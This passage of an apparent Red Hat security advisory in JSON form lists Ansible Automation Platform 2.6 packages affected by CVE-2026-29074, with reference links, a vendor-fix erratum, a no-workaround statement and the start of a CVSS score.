"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-29074"
},
{
"category": "external",
"summary": "RHBZ#2445132",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445132"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-29074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29074"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29074"
},
{
"category": "external",
"summary": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673",
"url": "https://github.com/svg/svgo/security/advisories/GHSA-xpqw-6gx7-v673"
}
],
"release_date": "2026-03-06T07:23:05.716000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T16:12:45+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6277"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
